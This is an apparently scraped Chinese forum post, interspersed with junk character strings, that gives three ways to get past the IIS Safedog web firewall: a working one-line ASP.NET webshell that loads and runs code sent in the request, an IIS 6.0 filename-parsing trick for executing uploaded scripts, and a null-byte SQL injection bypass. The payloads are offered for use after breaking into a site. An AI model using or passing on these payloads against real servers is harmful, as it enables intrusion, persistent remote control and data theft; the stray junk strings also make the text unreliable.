1、绕过IIS安全狗的一句话。+ p6 o# x- r' H6 u: W
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
$ u3 F$ E# R, H6 T( d3 h! s<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
' `* @! l' a: m+ w' h z7 ~: A& `4 `) e. K {) C
2、IIS6.0解析漏洞遇到安全狗。* L2 q! Z5 }6 V, T' J. ?
文件名为
) M2 V+ j& E9 X; Q- p9 |! ahttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
$ V" A& X9 f, N, Z! c! P. c. Q/ ^+ d; k5 s+ p/ U0 e' u$ c% q- K
这样的会被IIS安全狗果断屏蔽。$ ]. H+ E$ N* i4 ^4 \: s2 ]
改成如下名称,IIS6一样会解析:/ N2 x1 g( B* K: Y
www.xxxxx.com/;1.asp;1.jpg
# B8 [" d' k0 p4 ]' C3 i* ^3 I2 c& T' @% G! @
3、安全狗的注入绕过。
* R" U7 ~' ]; }+ e, u常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。; H5 K9 Z; a4 Z* \, o
但如果:
" S. K' [) m4 t/ Y" k: L, Ur00ts.asp?r00ts.com=%00.&id=69%20 and 1=17 {& ]/ q' F; S3 E; M
就可以成功绕过了。6 q, r, l! f; e; _
6 k7 J' y1 r( Y$ h7 ~' T6 k/ x" j- V: e$ l
|